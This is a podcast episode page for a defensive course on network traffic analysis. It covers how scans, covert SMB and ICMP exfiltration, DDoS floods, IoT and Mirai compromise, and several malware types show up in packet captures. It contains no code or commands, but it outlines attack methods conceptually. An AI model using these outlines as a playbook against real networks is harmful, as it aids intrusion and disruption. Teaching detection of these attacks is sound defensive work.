Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.
All content for CyberCode Academy is the property of CyberCode Academy and is served directly from their servers
with no modification, redirects, or rehosting. The podcast is not affiliated with or endorsed by Podjoint in any way.
Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.
Course 6 - Network Traffic Analysis for Incident Response | Episode 5: Scanning, Covert Data Exfiltration, DDoS Attacks and IoT Exploitation
CyberCode Academy
11 minutes
6 days ago
Course 6 - Network Traffic Analysis for Incident Response | Episode 5: Scanning, Covert Data Exfiltration, DDoS Attacks and IoT Exploitation
In this lesson, you’ll learn about: Network Threat Analysis — understanding how common attacks and advanced malware appear in real traffic captures, and how to extract intelligence from them. Part 1 — Analysis of Common Network Threats 1. Network Scanning Techniques Attackers scan networks to discover targets, services, and vulnerabilities. Demonstrations cover several scanning styles: SYN / Half-Open Scan
Sends SYN packets without completing the handshake.
Target responses reveal open vs. closed ports.
Full Connect Scan
Completes the full TCP three-way handshake.
More noticeable but highly accurate.
Xmas Tree Scan
Uses abnormal TCP flags: FIN + PUSH + URG.
Leveraged to probe how systems respond to malformed packets.
Zombie / Idle Scan
Uses an unwitting third-party host (“zombie”) to hide attacker identity.
Tracks incremental IP ID numbers to infer open ports.
Network Worm Scanning (e.g., WannaCry)
Worms scan many IPs for a single vulnerable port, such as SMB 445.
High-volume, repetitive traffic is a key signature.
2. Data Exfiltration (Covert Channels) Focus: understanding how attackers hide stolen data inside legitimate-appearing traffic. Covert SMB Channel
Data leaked one byte at a time inside SMB packets.
Requires:
Reviewing thousands of similar packets,
Extracting embedded data,
Base64 decoding,
Reversing the result,
Revealing hidden Morse code.
ICMP Abuse
Attackers embed data into ICMP type fields, reconstructing files (e.g., a GIF).
Difficult to detect because ICMP is normally used for diagnostics, not data transfer.
3. Distributed Denial of Service (DDoS) Attacks Explains why DDoS attacks remain common—cheap cloud resources, insecure IoT devices, accessible botnets. Volumetric SYN Flood
Floods a port (like HTTP 80) with incomplete handshakes.
Exhausts server connection capacity.
HTTP Flood
Sends massive amounts of GET/POST requests.
Harder to distinguish from normal traffic.
Amplification / Reflection Attacks
Small spoofed request → massive response to victim.
Memcache: tiny request → multi-megabyte responses from cached data.
4. IoT Device Exploitation Demonstration focuses on how attackers compromise weak devices such as DVRs.
Many IoT devices use default credentials and insecure services like Telnet.
Attack flow typically involves:
Logging in via Telnet.
Attempting to download malware (e.g., Mirai ELF binary).
When automated delivery (TFTP) fails → manually reconstructing binaries using echo.
Device joins a botnet and starts scanning other victims.
Part 2 — In-Depth Malware Case Studies 1. Remote Access Trojans (RATs)
Traffic begins with system information reporting from the infected host.
Followed by persistent command-and-control (C2) communication.
2. Fileless Malware
Malware runs directly in memory, leaving minimal filesystem artifacts.
Often, network traffic is the only complete copy of the payload available.
3. Network Worms
Automate scanning and propagation.
Look for specific open ports, then exploit and install themselves.
4. Multi-Stage Malware
Downloader retrieves multiple malware families.
Identifying...
CyberCode Academy
Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.
